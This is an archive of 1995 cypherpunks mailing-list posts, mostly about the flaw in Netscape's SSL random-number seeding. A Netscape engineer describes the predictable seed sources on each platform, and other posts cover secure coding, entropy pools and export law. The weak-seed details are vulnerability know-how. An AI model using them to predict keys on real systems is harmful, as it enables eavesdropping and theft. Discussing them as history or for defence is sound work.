>>  The IETF quite explicitly doesn't care about APIs
>
>With one exception so important that it might blow away your whole
>complaint...
>
>...GSSAPI.
>        /r$

And we see how far *that* effort has gotten...

There was some discussion in Toronto last summer about APIs for the basic
transports (i.e. standardizing "sockets", or TLI, or whatever), which got
backed off to a list of "required service elements" that a good stack
vendor should make available to the app programmers, and then the whole
notion got killed off for the reasons I cited.

GSSAPI was an attempt to make it easy to slide in authentication &
encryption into existing software - lay a foundation for real security in
the applications. A fine goal, but a bad plan for achieving the goal. I
think they were also trying to avoid blessing any particular crypto scheme,
to avoid both the export morass, and the patent morass - "we'll drop in
whatever we can get on good terms, later."

API and interface standards are to be avoided in part because of the
reasons I cited previously, in part because they're hard to do right for
all platforms (not everyone uses function-call style system/library calls),
and in part because they do not guarantee you interoperability - classic
case in point is the Microsoft Mail API (MAPI): you can put *anything*
under MAPI: Novell MHS, cc:Mail, QuickMail, or SMTP, just to name a few. If
you are not speaking the same wire protocol as your intended correspondent
(or peer), you lose, regardless of the fact that your software and hers are
both using the same API - you cannot interoperate.

What really annoys me is the fuss you see in the trade rags about
"middleware" these days; they've missed this entire point about interfaces
versus protocols, and they're propagating the misconception that interfaces
give interoperability to the general marketplace. And the vendors are
laughing all the way to the bank.

Erik Fair






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Wed, 20 Sep 95 08:28:30 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Press release
Message-ID: <v01510106ac85ee814baa@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

We've seen the word "hacker" kicked around rather arbitrarily in the press.
Are we to conclude that the cypherpunks are a bunch of hackers? I think its
time for some cypherpunks spin. How about a logo *and* a press release? The
press release would give contacts (email, phone, etc.) so that someone on
this list would be contacted by journalists when a crypto story breaks.

If we get enough volunteers, we can fax blanket every newspaper, station,
and network in the world.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMGBA2XIf3YegbdiBAQG0RQJXdWG0beFoFEk6BfEkhIDYxB6NsbSSIGWe
Nzob7W7Gd/YyRqsVhU5T8jQEpD6sNLwTP+4SypSC9Mk8EauKAvklHkkfGr53scQh
5Tzp
=Fxdn
-----END PGP SIGNATURE-----

Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 07:37:07 PDT
To: "Jeff Weinstein" <jsw@netscape.com>
Subject: Re: netscape's response
In-Reply-To: <9509200254.ZM206@tofuhut>
Message-ID: <199509201436.KAA05021@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Jeff Weinstein" writes:
>   It turns out that Taher Elgamal and I started working here within
> a week of each other, about 6 months ago.  Neither of us thought to
> take a serious look at the RNG seed code.  I don't think that anyone
> would accuse Taher of being an amateur in this area.

Well, he is more of a math guy than a practical guy.

For a long time, I've posted articles and have seen other people post
articles arguing that the right place to attack systems like this is
in spots like the random number generators.

Were I Netscape, I'd be conducting code reviews for lots of other
things, too.

Your coding standards should out and out ban the use, anywhere in your
code, of sprintf, gets, strcat, or any other thing that manipulates
strings without explicitly taking length limits. system and any
similar calls should also be banned entirely. It doesn't matter if you
"think" they are safe -- calls you don't use can't be somehow trickily
abused.

I suspect, however, that the seductiveness of "oh, this looks safe
enough" will probably continue to win out with your colleagues over
systematic approaches to these problems. After all, they never seemed
to learn the lesson in revision after revision of NCSA's stuff.

This is not to say that I think *you* are bad at this, Mr. Weinstein,
but you certainly have colleagues with the worst possible track record.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 03:38:58 PDT
To: cypherpunks@toad.com
Subject: Re: My Day
In-Reply-To: <43o44t$hof@calum.csclub.uwaterloo.ca>
Message-ID: <43oquc$70f@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <43o44t$hof@calum.csclub.uwaterloo.ca>, iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg) writes:
[ summary of Ian's day deleted ]

  Now imagine what my last 48 hours have been like.  :-)

> Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif ) was kind enough to
> verify that the SunOS 4.1.3 version of Netscape generates its keys in
> _exactly_ the same way as Solaris and HP-UX; he says he'll test other
> architectures tomorrow.  I suspect any big-endian machine with the
> lrand48() function (which is used in key generation on Solaris/HP-UX;
> it's disguised in unssl.c as the macro mklcpr()) will be the same.
> Other Unix flavours should require only minor changes.

  Most of the unix machines do the same thing.  On SGI machines
that have the hardware cycle counter, its value is used in place of the
srand48(usec), lrand48() sequence.  BSDI the code used srandom and random.

> I'm still interested in what Windoze clients do (other than lose).

  On windows and mac the first 32bit seed is seconds since 1970, and the
second 32bit seed is the "tick count", which I'm told is the number of
milliseconds since windows started.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arve Kjoelen <akjoele@shiva.ee.siue.edu>
Date: Wed, 20 Sep 95 08:38:52 PDT
To: cypherpunks@toad.com
Subject: drand48() bug
Message-ID: <199509201538.KAA28316@shiva.ee.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

jws@neon.netscape.com writes:
> Most of the unix machines do the same thing.  On SGI machines
> that have the hardware cycle counter, its value is used in place of the
> srand48(usec), lrand48() sequence.  BSDI the code used srandom and random.


Kun Luo, one of our grad students here recently found a bug in Sun's implemen-
tation of the drand48() function.  We reported it to Sun, and they acknowledged
the bug exists - it seemed to be the first time they had heard of it, though.  
The bug affects Sun's ANSI C compiler shipped with 
SPARCWorks3.0 and consists of the following:  If you're compiling using the
- -Xc flag (strict ANSI C, no SUN C compatibility extensions), the function
drand48() is BROKEN.  It ALWAYS returns the number 9.000000, no matter what
you seeded it with using srand48().

to reproduce, compile the following program under Solaris 2.x using their
C compiler AND the -Xc flag:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <time.h>
 
void main(){
   double number;
   int  num = 1000;
 
   srand48((int)time(NULL));
   while(num --){
        number = drand48();
        printf("%lf\n", number);
   }
}

By the way, Cyphepunks mail seems to indicate that Netscape uses lrand48()
instead of drand48().  lrand48() is NOT broken.  The potential for disaster
is high, though, for anyone blindly trusting vendor-provided pseudo-
random number generators.  How many products are out there using drand48()
as part of their random number generation scheme?

- -Arve
 
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
 
mQCNAzAvqdwAAAEEAKRdBFn7O/h+wz3tOQwHWvaFKS6gi+UezzCXli/QnuCrJcUE
agvlVVZ/PzKG5i23VdbghyHsVElvKzRW/D1pYor6xSluCftXzSxbCuiEIe2SXUsH
65AqFN688upXzRKHcq3bU/eKB7xUOGqCDot8AzModnwE+XWCgdqn8CTZCNGhAAUR
tCJBcnZlIEtqb2VsZW4gPGFram9lbGVAZWUuc2l1ZS5lZHU+
=csFb
- -----END PGP PUBLIC KEY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCUAwUBMGAusNqn8CTZCNGhAQEYdQP4+UGvLJKoQPWPLFMENDIPY1QSIuQdQxdt
fTzWRNXsPadE4N40bHgucqZQG8Ze55JsKIrrhL9RZFIVx+ygxsmsSHsocu/kFbSW
E7RNWMvoaoRAmB4KkWF+ofqRWl9Qo+r00CvgX1brsOdpjySVIkxml8/L7R/RBuQL
aFNV5OBz2w==
=saUT
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 20 Sep 95 07:40:46 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: USA Today on Fear of Credit Cards over Net
Message-ID: <9509201440.AA28932@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


USA Today reports in its 9/20/95 edition, on the front of the Money section,
that "Few Feel Safe Making On-Line Transactions". A survey of 427 "computer
users" by USA Today and Intelliquest yielded the results below. 

[The article doesn't say whether the survey was conducted before or after 
news of the bad seeds hit. <sigh>. I only bought USA Today because my best 
friend gets her 15 minutes of fame below the fold on page 7D of the Life 
section today.]

I'm not sure exactly what "sending a credit-card number to a commercial on-
line service" means. Apparently it's seen as slightly safer than phoning it
in, but much riskier than snail-mailing it in to an ISP. 

	How much do PC users trust:

	Automatic teller machines	77%
	Banking by phone		62%
	Banking by computer		57%
	Using a credit card or calling 
	card at a public phone		57%
	Writing a credit-card number on
	a catalog order form		43%
	Sending a credit-card number to
	a commercial on-line service	34%
	Giving a credit-card number
	over the phone			31%
	Sending a credit-card number
	over the Internet		 5%

	(margin of error = +/- 4.7%)

Raph also gets mentioned, mainly for "human interest" I'm afraid :/

	Even those familiar with the Internet do not routinely use it for
	financial transactions. Raph Levien -- a computer science Ph.D.
	candidate reached via Internet -- says he has only used his credit
	card once over the Internet. About a year ago, he bought three CDs:
	Best of Alan Parsons Project, Enya and Beethoven's Ninth. Levien is
	a member of the group cypherpunks, which announced on-line Sunday
	night that hackers found the security flaw in Netscape's software.
	Still, Levien says Netscape's system "is among the safest that
	there is."

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Wed, 20 Sep 95 10:51:33 PDT
To: cypherpunks@toad.com
Subject: Re: RSA Prevails In Arbitration Against Cylink
Message-ID: <v02110109ac860393cd56@[204.179.132.1]>
MIME-Version: 1.0
Content-Type: text/plain


Is there electronic copy of the Arbitration Panel's precise ruling
available? No quicker way to end the PR confusion than to read the Real
Thing(tm).

Erik






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Wed, 20 Sep 95 09:48:46 PDT
To: cypherpunks@toad.com
Subject: Re: My Day
In-Reply-To: <199509201411.JAA04860@khijol>
Message-ID: <199509201648.KAA11790@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Ed Carp writes:

> Also add that many people seem to tend to swirl the mouse in fast circles,
> where there isn't *any* latency between mouse movements, and you get even
> less entropy.  I suspect that Colin Plumb's code, while a nice try, would
> be a bit less useful that might have been otherwise suspected.

Colin's code, independent of implementation, simply uses MD5 as a block
cipher to "launder" bit-streams that contain non-uniform distributions of
true random data. See "Truly Random Numbers" in Dr. Dobb's Journal, November 
1994,  p. 113. How much entropy you get out depends entirely on what you
feed in. 

I've put my code up on the cypherpunks ftp site, but I'm still waiting to
hear back from the site maintainers as to its final location. In any case,
that code uses the mouse _position_ and system timings in microseconds as
input to the MD5 engine. So swirling the mouse should provide a good source
of random input, better the faster it's moved. 

However, any code that generates random session keys should properly include
routines to estimate the amount of entropy collected, and not generate a
128-bit key until at least 128 bits of entropy have been fed into the pool.
This is a non-trivial problem, although PGP makes a good stab at it. To my
knowledge, CryptDisk does not include this feature, and really ought to. For
my own purposes in Curve Encrypt, this is not necessary, since I don't 
generate session keys, only salts.

                                   -- Will

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 03:50:32 PDT
To: cypherpunks@toad.com
Subject: Re: SSL implementation problem at Netscape
In-Reply-To: <43kki8$os7@charm.magnus.acs.ohio-state.edu>
Message-ID: <43ork2$70f@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <43o47v$fsd@cnn.Princeton.EDU>, dawagner@flagstaff.princeton.edu (David A. Wagner) writes:
> In article <david-1909951219130001@192.0.2.1> from sci.crypt,
> David Sternlight <david@sternlight.com> wrote:
> > If the above is, in fact, accurate it appears to apply to previous
> > versions of Netscape, not the 2.0 versions for which the public beta goes
> > out next week.
> 
> We haven't tried it on v2.0, as we only have a copy of v1.1 right now.
> But the front-page New York Times article today said that the next version
> also has the same flaw, and that it'll be fixed before release.

  First off, Sternlight is not an agent working for netscape.  :-)

  The same fix that will be going out to patch old versions will be applied
to 2.0 before we do a public beta.  As with any code it will be refined
as necessary before the final release of 2.0.

[ stuff deleted ]

> While we don't yet know exactly how long it would take to break Netscape's
> PRNG in this threat model, I think it's clear that Netscape's current
> implementation is insufficient and insecure.

  Agreed.  See other messages of mine for a more detailed response.

> We don't know about e.g. PC's yet -- this is another area we were still
> working on.  I will note that Netscape didn't try to claim that any version
> was safe from this flaw, for what that's worth...

  Again, see my other messages on this and related topics for more details
of what the code was doing on PC and Mac.

> Hopefully this will be quickly fixed by Netscape, and then we can all stop
> worrying about it! :-)

  Yup.  Then I can get back to working only 16 hours a day.  :-)

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 20 Sep 95 10:43:54 PDT
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Press release
Message-ID: <ac85a0d02f0210048d00@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:28 PM 9/20/95, Dietrich J. Kappe wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>We've seen the word "hacker" kicked around rather arbitrarily in the press.
>Are we to conclude that the cypherpunks are a bunch of hackers? I think its
>time for some cypherpunks spin. How about a logo *and* a press release? The
>press release would give contacts (email, phone, etc.) so that someone on
>this list would be contacted by journalists when a crypto story breaks.
>
>If we get enough volunteers, we can fax blanket every newspaper, station,
>and network in the world.

I was of course being facetious about the putative "Cypherpunks logo."
Sorry I did not insert smileys.

The problem with the "Cypherpunks press release" notion is this:

-- we are an effective anarchy.

-- there is no "spokespunk" and no foreseeable way of choosing one.

Some people seem to _want_ some kind of central contact organization or
point, some place to lobby, buy advertising, send faxes, give press
conferences, etc.

But I don't see it happening.

Individuals and their organizations are free of course to do as they wish,
but if they claim to speak for "the Cypherpunks," they'll be out of line.

We are not a direct democracy, nor even are we a representative democracy.
No board of directors, etc.

While this undeniably affects how "messages" get out, that's life. There
are plenty of organizations with Washington offices, and with spokesmen
available for comment. But they don't have what we have.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Wed, 20 Sep 95 11:04:34 PDT
To: cypherpunks@toad.com
Subject: Announce: Private Idaho beta release
Message-ID: <199509201802.LAA10836@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I've finally gotten some time to incorporate a few new features/bug fixes
into Private Idaho (Windows remailer/PGP front-end).  The 2.5b4 release now
incorporates an easy interface to the alpha.c2.org nym server.  Also, simple
scripting is available for moving messages to e-mail apps that don't support
sequential header tabbing (Free Agent, Netscape, etc.).

The next available block of time will likely be devoted to incorporating
background POP3 scanning and downloading of PGP messages.

http://www.eskimo.com/~joelm - for your downloading please...

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP
Thomas Jefferson used strong crypto, shouldn't you?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 20 Sep 95 11:17:18 PDT
To: cypherpunks@toad.com
Subject: Re: Munitions shirt (again)
Message-ID: <ac85a2df3002100408ee@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:49 PM 9/20/95, Ian Goldberg wrote:
>So, Dave and I got free munitions shirts (they're different, though;
>the font is smaller and they have a bunch of X'd out Constitutional
>Amendments on the back; I think they ere designed by Joel Furr) for
>our bug find.
>
>So I'm wearing it today.  The thing is, I live in International House,
>a residence that has 50% non-Americans.
>
>So, any consensus as to whether it's actually illegal to do so?  I
>remember some disagreement a few weeks ago that AFAIK wasn't resolved.

The _consensus_ here seems to be: "This t-shirt is illegal to wear in front
of non-Americans," judging by the comments here.

The _reality_ is quite different, I think, and the "this shirt is illegal"
hype is, in my opinion, just that, hyperbole. Even hyperbull, too.

Books and written articles containing crypto algorithms are _not_ illegal
for "furriners" to look at. The t-shirt contains at most a fuzzy printing
of an algorithm that has been widely printed in various books and in
articles in mailing lists like ours.

(I agree that there are some unresolved issues with ostensibly
machine-readable forms. The t-shirt is not machine-readable by any
plausible interpretation of machine-readable.)


>As far as I can tell, it's _technically_ illegal, but any LEO would be
>out of his mind to try to enforce it (it would have to be a Fed, too,
>wouldn't it?  Or can regular city cops get you for violating export
>restrictions?).

Ian did great work on the latest Netscape break, but this is just plain crazy.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 08:07:08 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: My Day
In-Reply-To: <9509201248.AA09892@alpha>
Message-ID: <199509201506.LAA05066@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike McNally writes:
> Also (and note that it's been a while since I've messed around with
> PC's, but since the "architecture" remains chained to an early-80's
> design I suspect they're still the same) the PC clock frequency is
> generally pretty low.

No, it isn't actually. You can get a microsecond timer out of it. The
clock interrupts occur only infrequently, but the clock chip itself
increments very very fast, and if you wanted microsecond timings of
keystrokes there are registers that will give you what you want.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 20 Sep 95 08:18:15 PDT
To: cypherpunks@toad.com
Subject: Re: Security Flaw Is Discovered In Software Used in Shopping
Message-ID: <v02120d1aac85dff6bc68@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Wed, 20 Sep 1995 10:47:24 -0400 (EDT)
From: Nathaniel Borenstein <nsb@nsb.fv.com>
To: www-buyinfo@allegra.att.com
Subject: Re: Security Flaw Is Discovered In Software Used in Shopping

Without belaboring the point too much, I think there are a few
conclusions that really ought to be drawn:

-- The world has never seen unbreakable encryption software, and almost
certainly never will.  Nothing that human beings ever build is perfect.

-- Any encryption-based scheme is only as strong as its weakest link.
Generally, you don't know what the weakest link will turn out to be.

-- Basing a global financial infrastructure on the unbreakability of a
certain algorithm or program is at best imprudent.  Bear in mind that
people as well respected as Dr. Adelman -- the "A" in RSA -- are hard at
work trying to figure out how, for example, to use massive parallelism
to break the basic algorithms of public key cryptography.

-- Keeping sensitive financial information completely off the net is
always best, whether or not you are using encryption.

For information on a safe, non-cryptographic alternative that has been
fully operational for nearly a year, with over 30,000 paying customers,
a growth rate featuring a six week doubling period, and NO break-ins to
date, check out http://www.fv.com.  -- Nathaniel
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMANN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 20 Sep 95 08:22:32 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: USA Today on Fear of Credit Cards over Net
Message-ID: <199509201518.LAA78249@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<snip>

>	How much do PC users trust:
>
>	Automatic teller machines	77%
>	Banking by phone		62%
>	Banking by computer		57%
>	Using a credit card or calling 
>	card at a public phone		57%
>	Writing a credit-card number on
>	a catalog order form		43%
>	Sending a credit-card number to
>	a commercial on-line service	34%
>	Giving a credit-card number
>	over the phone			31%
>	Sending a credit-card number
>	over the Internet		 5%
>
>	(margin of error = +/- 4.7%)

<snip>

Pity they didn't ask about, "Tossing a credit card slip/carbon
in the garbage." Dumpster-diving is still an effective, lo-tech
attack.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMGAxQW1lp8bpvW01AQEfmwP9GfEzhoBWuTNHvxZ7dMvMV7K/cypT0XmO
kLqAAtPHyhS3PxmwNiT0G4tquU9QHw2cQ5Rj6IAqR7Fbuvtt1TW2Kora9RsXLp5L
75Zw63/wrsnI20qe+Pnf6FEG0IcjLg4vrezhAGYAC3zSdTpSW4cuqdzId6qeTlvM
4gg2Z9UGOrA=
=ReYK
-----END PGP SIGNATURE-----
Regards, Jim Ray

 "Not everything that is faced can be changed, but nothing can be
        changed until it is faced."  --  James Baldwin
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Wed, 20 Sep 95 10:39:49 PDT
To: cypherpunks@toad.com
Subject: MacRandoms
Message-ID: <199509201739.LAA12651@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain




OK, to get my implementation of Colin's randpool code for the Macintosh,

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/randomness/MacRandoms.sea.hqx

As a bonus, this also includes a nice 68K assembler implementation of MD5.
Enjoy.

                                  -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Wed, 20 Sep 95 08:52:51 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Time release crypto
In-Reply-To: <199509190930.CAA24047@ix.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950920113427.10619I-100000@dorsai.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Bill Stewart wrote:

> Technology can't solve the problem, only help a bit; algorithms
> aren't timebound.  In particular, true security depends on only
> being able to decrypt if you have the correct information, and there's
> no way to create decryption information in the future from 
> encryption pieces you have now without being able to create the 
> same information now.

Some of the following is probably idiotically obvious, but to prevent an 
attack on such a time keeper, it could be tied in to the atomic clocks, 
it could poll several PC's and check their time... any significant major 
time change would be spotted immediatly...  that is you couldn't possibly 
change the time on many machines at the same time without having physical 
access to all the machines, etc.  Altering the time on an atomic clock 
would be visible to just about everyone, etc.

This in now way would prevent an attacker from stealing the passphrase to 
the time signing service, so it wouldn't prevent anyone from issuing 
false keys.  But by using a hardware random generator the time keeping 
service could know if it issued a key or not by storing all the keys it 
issued previously.

This would achive the following: even if a theif stole the key, with 
enough randomization, the stolen keys would show up as valid, but would 
not show up in the time server's database - which should be written to 
write-once-media such as worm, or CDROM, etc...  the stolen key would 
generate valid time signatures, but would not be on the database, so it 
would be clear it was forged.  To get around this, the bad guy would need 
constant physical access to the time keeper, not just a single black bag 
job.

This also means that this database must be publically searchable at all 
times.  Perhaps the generator phassphrase should also be changed randomly 
as time passes - but then these things too would have to be stored 
somewhere before the time the key expires...

This is probably a bit far fetched, but the time keeper could be tied 
into astronomical events - that is have it follow the path of planets, 
star systems, etc. and derrive time that way and compare it with what 
time it thinks it is.  This would require quite a lot of sensors and 
extra hardware to track stars, planets, etc...   The bad guy would have 
to do a lot more work to get around this...  basically what you want to 
do is track some totally unalterable event to keep track of time, and we 
presume the NSA cannot change the orbits of planets... yet. ;-)


Another method would be to set up a key breaking system which would 
accept weaker keys - say 300 bits or so, and start breaking them.  This 
wouldn't guarantee they wouldn't be broken before such and such time, and 
wouldn't prevent anyone from running their own on faster hardware, or 
building special hardware optimized to break it faster though...  but 
without the private key, the only way to break it would be to brute force 
it.

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 20 Sep 95 11:58:55 PDT
To: cypherpunks@toad.com
Subject: netscape bug
Message-ID: <199509201855.LAA17261@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


clearly the netscape engineers did not practice "safe crypto programming",
but I question the seriousness of the crack.

none of the articles mention that the cracker must have login access
to the computer that the random numbers are generated on. is this true?
does the code require knowledge of the PID etc. that can only be obtained
by a login to the system that the netscape session is running on?

if this is true (i.e. login access required) this bug is by far not
as serious as some of the hyperbole is suggesting. I agree it is still
very insecure but the most dangerous crypto bugs are those where you
can determine keys from data alone.. physical penetration into a machine
is another level of security..

furthermore, I would like to commend Netscape for their fast response
to the problem and apparent commitment to establishing safeguards that
avoid it in the future.

cypherpunks have an easy time ridiculing someone who slit their throat
on writing some crypto functions, but geez, cut them some slack:
 crypto stuff has so many pitfalls and bugaboos that even the world-class 
experts make mistakes. where else can not properly "burning" stack 
registers (function parameters) and environment variables be considered 
"lethal"??? PGP errors have been reported on numerous 
occasions, some in the randomizer code. do people call for Zimmermann's
head on a stick and call him "incompetent"?

often when cryptographers say something is "broken" it can still mean
that it is not necessarily unsafe in practice. there are many shades
of "broken", some requiring a Cray and other's requiring a PC. I am
really surprised how much people here consider "broken is broken". this
is only the extreme theoretical perspective. granted I am not advocating
that people *not*fix* bad crypto functions, I'm only saying that maybe
its not in everyone's best interest to run around and say "the sky is
falling" and lambaste companies for minor difficulties..

Netscape is a world class product, and it's *free*. on this cypherpunks
list, I have seen no end to the venemous criticisms that people level at 
*free* products, which IMHO is quite tasteless at times. Netscape has
done far more for the cypherpunk cause than  many, many companies just
by including RC4 in their product. they have taken some heat for their
decisions & code, but they are on the front lines of battle. now instead of
our vague claims about how the world can benefit from good crypto, how
it is immensely valuable and important to cyberspatial financial transactions,

to promote the cypherpunk cause, we now have something *popular*, *physical*,
 and *tangible* to point to: netscape!!
this is *not* vaporware. this is not some cpunk saying, "all one needs
is [x] algorithm running on [y] network and you have a world class
infrastructure". the amount of work to get something like Netscape into
the world is quite daunting and herculean. we owe a great debt to netscape
and their accomplishments for furthering our own agenda!!! please do not 
trivialize what they have accomplished!! Netscape is here, it works, and
it is cyberspatial crypto that Joe Sixpack can understand and *use*!!
it is not a toy remailer, it is not some PGP front end, it is not some
mailer script, *this* is the format in which Joe Sixpack will be 
using crypto in the future, the format which will bring "crypto to the
unwashed masses"!!

Netscape may very well be the chief vehicle that puts on *concrete pressure*
on our government to relax crypto export laws. I see this happening 
*right now* with them going to a 64 bit key from a 40 bit one, and the
world starting to realize the importance of crypto and the idiocy of 
the export laws. I am really amazed at how few seem to be supporting
Netscape here and considering them the *premiere ally* in our current
battle. it reminds me of how much people here rant at Microsoft when 
virtually no other company on the planet could pull off what they make
look easy (ah, that's another story I've filled up other posts with).

please do *not* take an adversarial relationship with the companies
who are helping advance the cutting edge of cyberspace!! do *not*
ridicule them. rather, help them to understand their problems. I think
you will find that most companies are *not* hostile to improving their
software, and will readily admit it when it needs fixing (intel has
been humbled by their pentium glitch, and I doubt any company again will
ever be so obstinate and belligerent..) . 

I am willing to bet that the netscape bug would have been fixed quickly if it
had been quietly brought to their attention, without the blaring media
lights (I enjoy the media circus as much as the next guy, but on the
other hand, doing some things quietly may actually advance the cypherpunk
cause further than by making a noisy hullaballoo in cyberspace).

once again I commend Netscape for their fine software and willingness to
perfect it. netscape is at the cutting edge of advancing key cyberspace
technologies and it is not surprising that they make some minor mistakes
with the code in these early phases. cyberspace is very young!! give 
designers a bit of time to get it right. be patient!! do not accuse
them of incompetence!! netscape is tens of thousands of lines of 
world-class code. only in programming can a few moments of total,
rapt attention lead to bugs that get blared on the front page of
new york times and affect your stock price!! good lord, give the guys
a break.

cpunks: when Netscape has some serious competitors, they will get
their act together. but at the moment they are the only game in town,
and it will pay off to be nice to them, and try to support them, instead
of kicking them in the teeth and wringing them every time they make
a mistake. few in the world are as knowledgeable or paranoid as we are
about security, and its going to be a gradual process to get to even
a fraction of the expertise here penetrating the mainstream software
industry. be patient!!

--

P.M. notes that anywhere there is a data-driven buffer overflow (which
he suspects are all over netscape) he can get code to execute anything
